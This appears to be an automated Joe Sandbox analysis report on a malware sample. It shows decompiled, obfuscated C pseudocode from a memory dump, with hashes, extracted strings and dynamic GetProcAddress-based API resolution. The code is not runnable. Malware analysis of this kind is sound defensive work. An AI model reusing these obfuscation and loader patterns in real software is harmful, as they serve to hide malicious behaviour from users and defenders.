Similarity

API ID:
String ID: srcore.dll$f"
API String ID: 0-1201831617
Opcode ID: 146cc6fa695b4a885a15cb7030fcbfc4bafd035b37b240c26e11f6df8c09be1c
Instruction ID: 5d0e50d1a7602f452b88d3fd82285c481103f0cba976218e5e53f703862ca7d7
Opcode Fuzzy Hash: 146cc6fa695b4a885a15cb7030fcbfc4bafd035b37b240c26e11f6df8c09be1c
Instruction Fuzzy Hash: 6D21F575E043458FCB02CFF9D8802E97FB3FB69302F04526AD654A77A1D6740945CB62

Uniqueness

Uniqueness Score: -1.00%

Function 005DF30A Relevance: 2.6, Strings: 2, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E005DF30A(void* __ebx, void* __ecx, short __edx, void* __esi) {
				unsigned short _t12;
				unsigned short _t14;
				unsigned short _t17;
				unsigned short _t18;
				intOrPtr _t32;
				signed char _t34;
				short _t35;
				void* _t38;
				void* _t39;
				void* _t41;

				_t39 = __esi;
				_t35 = __edx;
				 *((intOrPtr*)(_t41 - 0x14)) =  *((intOrPtr*)(_t41 - 0x14)) + __ebx;
				_t12 =  *(_t41 - 8);
				_t32 =  *0x658142; // 0xa475
				 *(_t41 - 8) = _t12;
				if(_t12 + _t12 >= 0x23) {
					 *0x658146 =  *0x658146 + _t32;
					 *((intOrPtr*)(_t41 - 0x20)) =  *((intOrPtr*)(_t41 - 0x20)) - _t32;
				}
				_t33 = 0;
				_t14 =  *(_t41 - 8);
				if(_t14 < 0x208c68) {
					L7:
					 *0x659d8d =  *0x659d8d + _t39;
				} else {
					if(0x197a26 <= 0x35) {
						 *0x6580fc =  *0x6580fc + 0x564f97;
						_t33 = 0;
					}
					_t33 = _t33 + 1;
					if(_t33 < _t33) {
						 *0x6581b2 = _t35;
						goto L7;
					}
				}
				_push( *0x6580f4);
				 *0x65afdc = _t14;
				 *(_t41 - 8) = _t14;
				L005B26E5("api-ms-win-core-memory-l1-1-0.dll",  *0x6585a5, _t38, _t39 - 0xc9dd, 0, 0);
				_t17 =  *(_t41 - 8);
				 *0x658138 = _t33;
				_t34 =  *0x65816c; // 0xa24c
				 *(_t41 - 8) = _t17;
				_t18 = _t17 >> _t34;
				_push(_t18);
				_push(_t18);
				_push(E005DF3DC);
				_push(E005B32BA);
				return _t18;
			}

0x005df30a
0x005df30a
0x005df30a
0x005df30d
0x005df313
0x005df31a
0x005df322
0x005df32b
0x005df332
0x005df332
0x005df335
0x005df337
0x005df347
0x005df36e
0x005df372
0x005df349
0x005df34c
0x005df354
0x005df35d
0x005df35d
0x005df360
0x005df363
0x005df365
0x00000000
0x005df36c
0x005df363
0x005df37f
0x005df390
0x005df39d
0x005df3ab
0x005df3b5
0x005df3b8
0x005df3c2
0x005df3c9
0x005df3cc
0x005df3cf
0x005df3d0
0x005df3d1
0x005df3d6
0x005df3db

Strings

api-ms-win-core-memory-l1-1-0.dll, xrefs: 005DF3A0
LdrHotPatchRoutine, xrefs: 005DF324

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: LdrHotPatchRoutine$api-ms-win-core-memory-l1-1-0.dll
API String ID: 0-1823328508
Opcode ID: aec08edb2a6e33f82206a5c4b55c90776a1d729f9afc7df57d5345b5c835beee
Instruction ID: a888c50b321bbd6c788771cc532b8a92b3f59b95e5a010b41065ad89b2e4576a
Opcode Fuzzy Hash: aec08edb2a6e33f82206a5c4b55c90776a1d729f9afc7df57d5345b5c835beee
Instruction Fuzzy Hash: D911C474A50306DFDB10DFA8EC956CD7B72EB25315F045426D841F7762E6700949C715

Uniqueness

Uniqueness Score: -1.00%

Function 006026AD Relevance: 1.5, APIs: 1, Instructions: 9
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006026AD() {
				char _v20;
				struct _SYSTEMTIME* _v24;
				struct _SYSTEMTIME* _t4;

				_t4 =  &_v20;
				_v24 = _t4;
				GetLocalTime(_v24);
				return _t4;
			}

0x006026b3
0x006026b6
0x006026bc
0x006026c2

APIs

GetLocalTime.KERNEL32(?), ref: 006026BC

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 48b6d19f4211c1a2b9cdcc94505fc73da0546ab05299ff7c7c8b2fbed3e6a44b
Instruction ID: d32fdcb3b4cab9052d3691c31d7df2cbe9fa6f0ba8147badd495d8eb3e520f08
Opcode Fuzzy Hash: 48b6d19f4211c1a2b9cdcc94505fc73da0546ab05299ff7c7c8b2fbed3e6a44b
Instruction Fuzzy Hash: 6BC04C7080471D4ACB50DB94DD428BEB7B9AA40219F5001659811B1291EB719B5486EA

Uniqueness

Uniqueness Score: -1.00%

Function 0064C1C5 Relevance: 1.3, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0064C1C5(void* __ebx, unsigned short __ecx, void* __edx, signed int __edi, void* __esi, void* __eflags) {
				void* _t13;
				char _t16;
				char _t17;
				char _t19;
				intOrPtr _t23;
				unsigned short _t44;
				unsigned short _t45;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				short _t53;
				void* _t58;
				void* _t64;

				_t61 = __esi;
				_t44 = __ecx;
				 *0x65afd9 =  *0x65afd9 - L00634D6C(_t13, __ebx, __edx, __edi, __esi, 0, __esi, 0) + 0xcc;
				_t58 = (__edi & 0x00c9885a) - 0xd09a9c;
				_t16 =  *((intOrPtr*)(_t64 - 8));
				_push( *((intOrPtr*)(_t64 - 0x1c)));
				 *0x65819c =  *0x65819c + _t44;
				_t51 = __edx + __edx;
				if((_t51 & 0x0084b182) < 0) {
					 *0x65afd5 =  *0x65afd5 - _t51;
				}
				 *0x65afda = _t16;
				 *((intOrPtr*)(_t64 - 8)) = _t16;
				_t17 =  *((intOrPtr*)(_t64 - 8));
				if(_t44 >= _t44) {
					_t49 =  *0x658176; // 0x9931
					_t44 = _t49 - 0x7897;
					 *0x6581de = _t51;
				}
				_t52 =  *0x658212; // 0x9d6c
				_t53 = _t52 - 1;
				 *0x65afd6 = _t17;
				_push( *((intOrPtr*)(_t64 - 0x20)));
				 *0x658549 = _t17;
				 *((intOrPtr*)(_t64 - 8)) = _t17;
				_t45 = _t44 >> _t44;
				_t19 = L0062B845(0, _t45, _t58 - 0x00000001 | 0x00000004, _t61);
				if(0 >= 0) {
					 *0x6581b4 = _t53;
					 *0x658222 =  *0x658222;
					 *0x65afd5 =  *0x65afd5 - _t19;
					 *0x65afda = _t19;
					_t23 =  *0x65afdc; // -49
					 *0x658465 =  *0x658465 - _t23;
					 *0x65afca =  *0x65afca + 0 - _t45;
					 *0x658168 =  *((intOrPtr*)(_t64 - 0xc));
				}
				_push(E0064C2FF);
				_push(E005FF4F8);
				return  *((intOrPtr*)(_t64 - 8));
			}

0x0064c1c5
0x0064c1c5
0x0064c1d2
0x0064c1de
0x0064c1e4
0x0064c1ee
0x0064c1f1
0x0064c1f8
0x0064c201
0x0064c203
0x0064c20b
0x0064c213
0x0064c218
0x0064c227
0x0064c22c
0x0064c22e
0x0064c235
0x0064c23a
0x0064c23a
0x0064c241
0x0064c248
0x0064c249
0x0064c24f
0x0064c256
0x0064c261
0x0064c273
0x0064c27c
0x0064c283
0x0064c291
0x0064c2a1
0x0064c2a8
0x0064c2b7
0x0064c2c0
0x0064c2c6
0x0064c2d6
0x0064c2e8
0x0064c2e8
0x0064c2f4
0x0064c2f9
0x0064c2fe

Strings

EEb, xrefs: 0064C256

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: EEb
API String ID: 0-2812423437
Opcode ID: 7679b1915d25b15df94f2a5af69e416d2c39749ba0ce6086ba5e478a3caf9129
Instruction ID: 61e4732ce2d3bbd818e63fc3077ed39a66e7cd964597fe009680eb9c77d105b2
Opcode Fuzzy Hash: 7679b1915d25b15df94f2a5af69e416d2c39749ba0ce6086ba5e478a3caf9129
Instruction Fuzzy Hash: 6731CEB5B147468FCB41EFF9EC946C93FB3EB29322F0461A9C544A3B22D6B40245CB19

Uniqueness

Uniqueness Score: -1.00%

Function 006130E2 Relevance: 1.3, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E006130E2() {
				intOrPtr _t20;
				intOrPtr _t23;
				intOrPtr _t27;
				void* _t28;
				short _t38;
				void* _t47;
				signed int _t49;
				void* _t50;

				if(_t28 != _t28) {
					 *0x65813c = _t38;
				}
				_t20 =  *((intOrPtr*)(_t50 - 8));
				if(0x90 != 0) {
					L7:
					 *0x65ab8a =  *0x65ab8a - _t47;
					 *0x65afdb =  *0x65afdb + _t20;
					goto L8;
				} else {
					if(0x80 <= 0) {
					}
					if(_t49 < 0) {
						L8:
						_push( *((intOrPtr*)(_t50 - 0x4c)));
						 *((intOrPtr*)(_t50 - 8)) = _t20;
						 *((intOrPtr*)(_t50 - 0xc)) = _t20;
						if(0x432a61 < 0x432a61) {
							L11:
							L12:
							 *((intOrPtr*)(_t50 - 0x10)) = 0x2ee379;
							 *0x658164 =  *((intOrPtr*)(_t50 - 0x18));
							_t23 = _t50 - 0x44;
							 *((intOrPtr*)(_t50 - 0x18)) = 0x2ee379;
							 *((intOrPtr*)(_t50 - 8)) = _t23;
							_push(_t23);
							_push(0x6131af);
							goto __eax;
						}
						 *((intOrPtr*)(_t50 - 0x20)) =  *((intOrPtr*)(_t50 - 0x20)) + 0x724f;
						 *0x65afd5 =  *0x65afd5 + _t20;
						if((_t49 & 0x009f17be) <= 0) {
							goto L12;
						}
						 *0x65afda = 0xcc;
						_t27 =  *0x65afdc; // -49
						_t20 = _t27 - 5;
						goto L11;
					} else {
						goto L7;
					}
				}
			}

0x006130e5
0x006130ec
0x006130ec
0x006130f3
0x00613102
0x0061311b
0x0061311b
0x00613121
0x00000000
0x00613104
0x00613107
0x00613107
0x00613113
0x00613127
0x0061312f
0x00613134
0x00613137
0x00613147
0x0061317d
0x00613182
0x00613187
0x0061318f
0x00613199
0x0061319c
0x0061319f
0x006131a2
0x006131a3
0x006131ad
0x006131ad
0x0061314f
0x0061315d
0x00613169
0x00000000
0x00000000
0x0061316d
0x00613174
0x0061317a
0x00000000
0x00613115
0x00000000
0x00613115
0x00613113

Strings

y., xrefs: 00613182

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: y.
API String ID: 0-4282597594
Opcode ID: 2fcb4733378ac7c0cdd3ab4899423f0a5c85dc562f8b36c8949d87c9d816c3c1
Instruction ID: 9cd7e05ea6be77ab93f4b85754ea7137cd9582accded31800da85d5e71c370e3
Opcode Fuzzy Hash: 2fcb4733378ac7c0cdd3ab4899423f0a5c85dc562f8b36c8949d87c9d816c3c1
Instruction Fuzzy Hash: 3E110DB1E0435A9FCB11DFE9D8412DDBBB3EB29312F08126AC945E7361D3300A42CB55

Uniqueness

Uniqueness Score: -1.00%

Function 005FC47F Relevance: 1.3, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E005FC47F() {
				char _t2;
				void* _t8;

				_t2 =  *((intOrPtr*)(_t8 - 8));
				_push(_t2);
				 *0x65afdc = _t2;
				_push(E005FC4A7);
				goto ( *0x658ebd);
			}

0x005fc47f
0x005fc48f
0x005fc490
0x005fc496
0x005fc4a1

Strings

NlsLexicons0047.dll, xrefs: 005FC482

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: NlsLexicons0047.dll
API String ID: 0-3725575709
Opcode ID: 232904ed5d472f063c0b0f8052fc1b54a45a5f427081e6f254ab935e5ad3277f
Instruction ID: 0ad92cb7d4e3568f0d1f02662074cca4942c38d1be053cbe5369f8ca9f851c24
Opcode Fuzzy Hash: 232904ed5d472f063c0b0f8052fc1b54a45a5f427081e6f254ab935e5ad3277f
Instruction Fuzzy Hash: 6CD0CA303013849F8300CFD8E892A313BB6A30C227F0026619A40A7A62CBB41C08CB12

Uniqueness

Uniqueness Score: -1.00%

Function 005BB66F Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E005BB66F(intOrPtr __eax, void* __ebx, signed char __ecx, signed char __edx) {
				intOrPtr _t26;
				intOrPtr _t31;
				unsigned short _t47;
				signed char _t54;
				void* _t60;
				void* _t61;
				void* _t62;

				_t56 = __edx;
				_t54 = __ecx;
				 *((intOrPtr*)(_t62 - 0xc)) = __eax;
				 *((intOrPtr*)(_t62 - 0xc)) = __eax;
				_t26 =  *((intOrPtr*)(_t62 - 0xc));
				 *((intOrPtr*)(_t62 - 0x4c)) = _t26;
				if(__ecx <= __ecx) {
					 *0x6581f0 = __edx + 1;
					_t56 =  *0x658242; // 0x5167
				}
				 *((intOrPtr*)(_t62 - 8)) = _t26;
				 *((intOrPtr*)(_t62 - 0xc)) = _t26;
				E005B359F( !0x395507, _t54, _t56, _t60, _t61, 0,  *((intOrPtr*)(_t62 - 8)));
				_t31 =  *((intOrPtr*)(_t62 - 8));
				_t47 =  *((intOrPtr*)(_t62 - 0xc)) + 0x2c2061 >> _t54;
				_push( *((intOrPtr*)(_t62 - 0x4c)));
				if((_t56 & 0x0000008c) >= 0) {
					 *0x658200 =  *0x658200 + _t56;
					 *0x65821c = _t56;
					_t47 =  *0x65afd6; // 0x3d
				}
				 *((intOrPtr*)(_t62 - 8)) = _t31;
				E005B359F(_t47 - 0xc4, _t54, _t56, _t60, _t61, _t31, _t31);
				 *((intOrPtr*)(_t62 - 0x14)) = 0x32af7b;
				 *((intOrPtr*)(_t62 - 0x10)) = 0x175b75a;
				_push(E005BB74A);
				_push(L00633C1E);
				return  *((intOrPtr*)(_t62 - 8));
			}

0x005bb66f
0x005bb66f
0x005bb66f
0x005bb672
0x005bb67e
0x005bb681
0x005bb689
0x005bb68c
0x005bb69a
0x005bb6a1
0x005bb6a3
0x005bb6a6
0x005bb6be
0x005bb6d7
0x005bb6da
0x005bb6dd
0x005bb6e3
0x005bb6e5
0x005bb6ec
0x005bb6f5
0x005bb6f5
0x005bb6fe
0x005bb703
0x005bb712
0x005bb734
0x005bb73f
0x005bb744
0x005bb749

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73bdc3b2e1f2c2e69758d55ba5d7bf030a8e17c7c22deae4ecb901cce74ff050
Instruction ID: bff372768706b84115bcb8376bc79f317316242c97dea135f97bdd41f5420b5a
Opcode Fuzzy Hash: 73bdc3b2e1f2c2e69758d55ba5d7bf030a8e17c7c22deae4ecb901cce74ff050
Instruction Fuzzy Hash: 0921E5B4E40609AFDB00DFA9D884ADCBFB2FB29311F149169A858E7760E7745A41CF11

Uniqueness

Uniqueness Score: -1.00%

Function 005CA2AD Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62283e2977b6e14e47a2c76a757d74b186b697f3e4ce2b6a134e5d5ca0883561
Instruction ID: cd9402a32680e1decb5ee75cb5ad1d8b256e42cb880b64873cec1d0bf454550a
Opcode Fuzzy Hash: 62283e2977b6e14e47a2c76a757d74b186b697f3e4ce2b6a134e5d5ca0883561
Instruction Fuzzy Hash: 801110B8E5030AAFCB40DFA8E980ADCBFB2FB18710F509569D408E7B50E7705A81CB44

Uniqueness

Uniqueness Score: -1.00%

Function 005FD28E Relevance: .0, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E005FD28E() {
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				void* _t15;
				void* _t17;
				void* _t18;

				asm("adc eax, 0x658200");
				_t6 =  *((intOrPtr*)(_t18 - 8));
				 *0x65afc8 =  *0x65afc8 + _t6;
				 *((intOrPtr*)(_t18 - 8)) = _t6;
				 *0x658f7d = _t10;
				_push(0);
				_push(_t10);
				_push(_t10);
				E005F415D(_t15 - _t17);
				 *0x658148 = _t12 + _t12;
				_push(E005FD2D9);
				goto ( *0x658ee9);
			}

0x005fd28e
0x005fd295
0x005fd298
0x005fd29e
0x005fd2a1
0x005fd2b0
0x005fd2b2
0x005fd2b3
0x005fd2b4
0x005fd2be
0x005fd2c8
0x005fd2d3

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f19d67c30b58268e58db646991cf5944b724006775cfaa70e73c7c6975ab769
Instruction ID: c66d2de214a80986d647ad5655059371776c84880149a6f9ddc37516c6558a36
Opcode Fuzzy Hash: 7f19d67c30b58268e58db646991cf5944b724006775cfaa70e73c7c6975ab769
Instruction Fuzzy Hash: 63E01A71E04309EFD700EFA8ECD2AE97FB6FB04349F105056E100E3A51CA705A80CB40

Uniqueness

Uniqueness Score: -1.00%

Function 005FC03A Relevance: .0, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E005FC03A() {

				_push(E005FC04E);
				goto ( *0x658f35);
			}

0x005fc03d
0x005fc048

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79492f09790eae468928226a169115f84790456cd3c05fea208588efe836af96
Instruction ID: b57b1a3bdb9ece7693b44562c0e9ad47fa55542e6ab74daf255bf3e2fef1c39e
Opcode Fuzzy Hash: 79492f09790eae468928226a169115f84790456cd3c05fea208588efe836af96
Instruction Fuzzy Hash: 4DB00235654208DF8714CB44DD45C597B77B78C7C3F105190D11067554CF755D419F41

Uniqueness

Uniqueness Score: -1.00%

Function 005E419D Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 232libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 005E432C

Strings

rpcref.dll, xrefs: 005E4354
CreateDisc.dll, xrefs: 005E41E0
api-ms-win-core-memory-l1-1-0.dll, xrefs: 005E43EB
GetProcessorSystemCycleTime, xrefs: 005E425A
RK0, xrefs: 005E4494
dispex.dll, xrefs: 005E4346, 005E434B
RtlQuerySecurityObject, xrefs: 005E43F8
WmiApSrv.exe, xrefs: 005E44A4
dwmcore.dll, xrefs: 005E4446, 005E44D7
IEShims.dll, xrefs: 005E4239, 005E4473, 005E44FD
VarFormatDateTime, xrefs: 005E437D

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AddressProc
String ID: CreateDisc.dll$GetProcessorSystemCycleTime$IEShims.dll$RK0$RtlQuerySecurityObject$VarFormatDateTime$WmiApSrv.exe$api-ms-win-core-memory-l1-1-0.dll$dispex.dll$dwmcore.dll$rpcref.dll
API String ID: 190572456-1787658155
Opcode ID: b1ac8ad38cd225dfaa9d56fedecd9ffc1557e533cf92a4ea93d6742b87093518
Instruction ID: 9a17ff976c281258d5e7a87764bc55c8c26157e042715aa2b01e657100e95e79
Opcode Fuzzy Hash: b1ac8ad38cd225dfaa9d56fedecd9ffc1557e533cf92a4ea93d6742b87093518
Instruction Fuzzy Hash: DE91BA74A107468FCB00DFF9E8942DD7FB2FB29312F045229D985A7B61E7740A86CB52

Uniqueness

Uniqueness Score: -1.00%

Function 005B63A0 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E005B63A0(void* __ebx, void* __ecx, short __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t53;
				signed int _t60;
				signed int _t63;
				signed int _t73;
				signed int _t76;
				_Unknown_base(*)()* _t78;
				signed int _t84;
				char* _t101;
				intOrPtr _t144;
				signed int _t145;
				short _t147;
				void* _t149;
				intOrPtr _t154;
				short _t164;
				void* _t170;
				unsigned short _t173;
				void* _t177;

				_t170 = __edi;
				_t164 = __edx;
				E005B359F(__ebx, __ecx, __edx, __edi, __esi, 0, 0);
				_t101 =  *(_t177 - 0x18);
				_t144 =  *0x658124; // 0x96f5
				 *0x65afcf =  *0x65afcf - _t144;
				 *0x65afcf =  *0x65afcf + _t144;
				_t145 = _t144 + _t144;
				_t53 =  *(_t177 - 8);
				_push( *0x658012);
				_t173 = __esi + 0xc16f4e;
				 *(_t177 - 8) = _t53;
				if(_t53 < 0x18a8f8) {
					L5:
					if(_t170 >= 0) {
						_t53 = 0;
						goto L7;
					}
				} else {
					_t101 = _t101 - 0x34;
					 *0x6580c2 =  *0x6580c2 + _t101;
					 *0x65afcc =  *0x65afcc + _t101;
					if(_t101 <= _t145) {
						L4:
						 *0x65821c = _t164;
						 *0x65afd8 =  *0x65afd8 - _t53 - 0xbc;
						_t173 = _t173 + _t173 >> _t145;
						goto L5;
					} else {
						_t145 = _t145 - 0x584d4c;
						if(_t145 > _t145) {
							L7:
							 *(_t177 - 0x10) = _t101;
						} else {
							_t145 = _t145 + _t145;
							_t164 =  *0x6581ca; // 0xaf3e
							goto L4;
						}
					}
				}
				_push( *0x6580b8);
				 *(_t177 - 0x18) =  &(( *(_t177 - 0x18))[_t101]);
				_t147 =  !_t145 - 0x6e;
				_t60 =  *(_t177 - 8);
				 *((intOrPtr*)(_t177 - 0xc)) =  *((intOrPtr*)(_t177 - 0xc)) - _t60;
				_push( *0x6581ce);
				 *(_t177 - 8) = _t60;
				 *((intOrPtr*)(_t177 - 0x1c)) = _t147;
				 *0x658140 = _t147;
				_t149 = _t147 - 0x64fec9 + 0x787e;
				_t63 = E0064F3FD( *(_t177 - 8));
				 *(_t177 - 8) = _t63;
				_push(0);
				_push(_t63 - 0x1bf8);
				E005B32BA(_t149);
				 *(_t177 - 0x10) = "srcore.dll";
				 *0x65afce =  *0x65afce - _t149;
				L005B1BC0( !( *(_t177 - 8)) +  !( *(_t177 - 8)), 0x51a7c1, 0x8277, _t164 + 0x8237b1, _t170, _t173, 0, 0x51a7c1, 0);
				_t73 =  *(_t177 - 8);
				 *(_t177 - 0x50) = _t73;
				_push( *(_t177 - 0x50));
				 *(_t177 - 8) = _t73;
				_t76 =  *(_t177 - 8);
				if(0 == 0x3e) {
					 *0x658166 = 0xbadbac;
				}
				_t154 =  *0x65819a; // 0xa3f0
				 *0x6581e8 =  *0x6581e8 + 0x8bde;
				_push( *0x6583c1);
				 *(_t177 - 8) = _t76;
				if(_t76 != 0x1a) {
					L13:
					_t154 = 0x68a0;
				} else {
					if(0x3a7acb == 0x3a7acb) {
						goto L13;
					}
				}
				 *((intOrPtr*)(_t177 - 0x24)) =  *((intOrPtr*)(_t177 - 0x24)) + _t154;
				_t78 = GetProcAddress(??, ??);
				 *0x65afd8 = _t78;
				 *(_t177 - 8) = _t78;
				 *0x658166 = 0x8c3b;
				 *0x658204 = 0xffffffffffffffff;
				_t84 =  *(_t177 - 8);
				 *0x659259 = _t84;
				 *(_t177 - 8) = _t84;
				 *(_t177 - 0x10) = 0xc0;
				 *((intOrPtr*)(_t177 - 0x14)) = 0x32e560;
				_push(0);
				_push(0);
				_push(E005B6676);
				_push(E005B359F);
				return 0x25b0bb;
			}

0x005b63a0
0x005b63a0
0x005b63a4
0x005b63b0
0x005b63b3
0x005b63ba
0x005b63c0
0x005b63c6
0x005b63c8
0x005b63cb
0x005b63d4
0x005b63da
0x005b63e2
0x005b6429
0x005b6433
0x005b6437
0x00000000
0x005b6437
0x005b63e6
0x005b63e6
0x005b63e9
0x005b63f0
0x005b63fa
0x005b6412
0x005b6412
0x005b641e
0x005b6424
0x00000000
0x005b63fc
0x005b63fc
0x005b6404
0x005b6439
0x005b643f
0x005b6406
0x005b6406
0x005b640b
0x00000000
0x005b640b
0x005b6404
0x005b63fa
0x005b6449
0x005b6450
0x005b6456
0x005b6481
0x005b6484
0x005b6489
0x005b6492
0x005b64ad
0x005b64b0
0x005b64bd
0x005b64c2
0x005b64cd
0x005b64d4
0x005b64d6
0x005b64d7
0x005b64dc
0x005b64ec
0x005b650f
0x005b652d
0x005b6530
0x005b653e
0x005b6541
0x005b654b
0x005b6551
0x005b655a
0x005b655a
0x005b6561
0x005b656c
0x005b6573
0x005b6579
0x005b657e
0x005b6593
0x005b6593
0x005b6582
0x005b658d
0x00000000
0x005b6591
0x005b658d
0x005b6597
0x005b65a7
0x005b65b1
0x005b65c3
0x005b65ea
0x005b65f9
0x005b6611
0x005b6614
0x005b661b
0x005b6628
0x005b664b
0x005b6668
0x005b666a
0x005b666b
0x005b6670
0x005b6675

APIs

GetProcAddress.KERNEL32(?,00000000), ref: 005B65A7

Strings

srcore.dll, xrefs: 005B64A8
api-ms-win-core-memory-l1-1-0.dll, xrefs: 005B6623
GetProcessorSystemCycleTime, xrefs: 005B660C
`2, xrefs: 005B6643
_fltused, xrefs: 005B6466
Heap32ListNext, xrefs: 005B63A9
RtlIpv4StringToAddressW, xrefs: 005B6524
%/, xrefs: 005B65D8
findnetprinters.dll, xrefs: 005B6631

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AddressProc
String ID: GetProcessorSystemCycleTime$Heap32ListNext$RtlIpv4StringToAddressW$_fltused$`2$api-ms-win-core-memory-l1-1-0.dll$findnetprinters.dll$srcore.dll$%/
API String ID: 190572456-3184872942
Opcode ID: f625528d33df91fbc7857e3cf76da2d4ab5e5fdf28b400beed05a132f6e8fe21
Instruction ID: 4b56a8fb4681c8b74cb44d11334a44baea5ada6034e0bb20dcb9a43eeb2ec035
Opcode Fuzzy Hash: f625528d33df91fbc7857e3cf76da2d4ab5e5fdf28b400beed05a132f6e8fe21
Instruction Fuzzy Hash: 83719A74A4070A9FDB00DFF9E8A42DDBFB2FB18311F405179E944E7782E6785A868B50

Uniqueness

Uniqueness Score: -1.00%

Function 005EA365 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 170libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00006996,00000000), ref: 005EA4EE

Strings

rpcref.dll, xrefs: 005EA3A4
', xrefs: 005EA59C
WmiApSrv.exe, xrefs: 005EA41E, 005EA52A
winresume.exe, xrefs: 005EA380
ehui.dll, xrefs: 005EA484
dwmcore.dll, xrefs: 005EA39D
Sq8, xrefs: 005EA50D
LdrHotPatchRoutine, xrefs: 005EA474
VarFormatDateTime, xrefs: 005EA4B7, 005EA5A1, 005EA5A6

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AddressProc
String ID: LdrHotPatchRoutine$Sq8$VarFormatDateTime$WmiApSrv.exe$dwmcore.dll$ehui.dll$rpcref.dll$winresume.exe$'
API String ID: 190572456-4179309623
Opcode ID: fe0b2aa49d4cf68adeed94e207b90c19107348db53e27d38a16835d78841471a
Instruction ID: 460c63a137108bff8881006f9b097cf8beada660a30915d616d1bc2bbcf9bceb
Opcode Fuzzy Hash: fe0b2aa49d4cf68adeed94e207b90c19107348db53e27d38a16835d78841471a
Instruction Fuzzy Hash: 1451A871A107069FCB00DFB8D8D42CEBFB2FB28311F04516AE989E7711E6705A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0060717F Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 311COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,00000208), ref: 0060737C

Strings

bridgeunattend.exe, xrefs: 0060735B
dT3, xrefs: 006074D6
GetThreadWaitChain, xrefs: 00607263, 0060740D
dispex.dll, xrefs: 006075D6
WmiApSrv.exe, xrefs: 006074BB
dwmcore.dll, xrefs: 006074CE
GetDlgItem, xrefs: 006073E3

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: FileModuleName
